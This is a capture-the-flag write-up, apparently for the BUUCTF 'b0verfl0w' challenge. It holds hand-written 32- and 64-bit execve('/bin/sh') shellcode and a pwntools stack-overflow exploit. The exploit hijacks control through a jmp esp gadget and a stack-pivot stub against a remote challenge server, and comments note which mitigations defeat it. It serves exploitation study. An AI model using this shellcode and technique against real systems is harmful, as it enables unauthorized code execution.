x_ctf_b0verfl0w

这里记录汇编代码写shellcode+jmp esp指令劫持esp的情况

可以溢出的字节放不下pwntools生成的shellcode时,需要我们自己写shellcode缩短长度

32位:

# 32-bit execve("/bin/sh") shellcode written by hand so it fits in the few
# overflowable bytes. The per-instruction notes inside the string are the
# author's assembler comments (part of the string literal, not Python comments):
# zero eax/edx, push the NUL-terminated "/bin//sh" onto the stack, point ebx at
# it, zero ecx, set al to 0xB (execve) and trap into the kernel with int 0x80.
shellcode ='''
xor eax,eax #eax置0
xor edx,edx #edx置0
push edx #将0入栈,标记了”/bin/sh”的结尾
push 0x68732f2f #传递”/sh”,为了4字节对齐,使用//sh,这在execve()中等同于/sh
push 0x6e69622f #传递“/bin”
mov ebx,esp #此时esp指向了”/bin/sh”,通过esp将该字符串的值传递给ebx
xor ecx,ecx
mov al,0xB #eax置为execve函数的中断号
int 0x80 #调用软中断
'''
# asm() is pwntools' assembler (brought in by `from pwn import *`); the target
# architecture comes from context(), which the exploit sets to i386.
shellcode=asm(shellcode)
# Earlier 21-byte variant kept by the author for reference only.
#shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
# Pre-assembled bytes of the listing above (23 bytes), so the exploit can embed
# them directly without calling asm() at runtime.
shellcode="\x31\xC0\x31\xD2\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x31\xC9\xB0\x0B\xCD\x80"

64位:

# 64-bit counterpart of the shellcode above: rax = 0x3b (execve on x86-64
# Linux, loaded via push/pop to keep the encoding short), rdi = pointer to
# "/bin/sh" built on the stack from the 7-byte immediate 0x68732f6e69622f,
# rsi = rdx = 0 (no argv/envp), then `syscall`. Requires an amd64 context().
shellcode=asm('''
xor rax,rax
push 0x3b
pop rax
xor rdi,rdi
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
xor rsi,rsi
xor rdx,rdx
syscall
''')
# Pre-assembled bytes of the listing above (30 bytes).
shellcode = '\x48\x31\xC0\x6A\x3B\x58\x48\x31\xFF\x48\xBF\x2F\x62\x69\x6E\x2F\x73\x68\x00\x57\x54\x5F\x48\x31\xF6\x48\x31\xD2\x0F\x05'

exp:

# Exploit script for the b0verfl0w challenge (Python 2: note the
# `print len(...)` statement syntax).
# Flow: the stack buffer is overflowed with the 23-byte shellcode, padded up to
# the saved return address, which is overwritten with a `jmp esp` gadget; the
# bytes that follow are a stub that moves esp back to the buffer and jumps there.
# Defender's view: the chain needs an executable stack (no NX) and a gadget at a
# fixed address (presumably a non-PIE binary — confirm with checksec); either
# mitigation breaks it, and a stack canary would abort before the return.
from pwn import *
# i386 target; log_level='debug' prints every byte sent and received.
context(os='linux', arch='i386', log_level='debug')
#io = process("./b0verfl0w")
io = remote("node4.buuoj.cn",25948)
# Pre-assembled 32-bit execve("/bin/sh") shellcode (same bytes as the listing above).
shellcode = "\x31\xC0\x31\xD2\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x31\xC9\xB0\x0B\xCD\x80"
print len(shellcode) #23

# Address of a `jmp esp` gadget in this specific binary (value taken from the
# writeup; it is not valid for any other build).
jmp_esp=0x8048504
# Stub that runs after the gadget: at that point esp points just past the
# overwritten return address, i.e. at this stub. 0x28 = 0x24 bytes
# (shellcode + padding) + the 4-byte return address, so after `sub esp,0x28`
# esp is back at the start of the buffer and the second `jmp esp` runs the shellcode.
sub_esp_jmp=asm('sub esp,0x28;jmp esp')

# Layout: [shellcode][padding up to 0x24 bytes][jmp esp address][sub esp,0x28; jmp esp].
# 0x20 + 4 presumably covers the buffer plus the saved ebp — verify against the binary.
payload=shellcode+(0x20-len(shellcode)+4)*'a'+p32(jmp_esp)+sub_esp_jmp

io.sendline(payload)

io.interactive()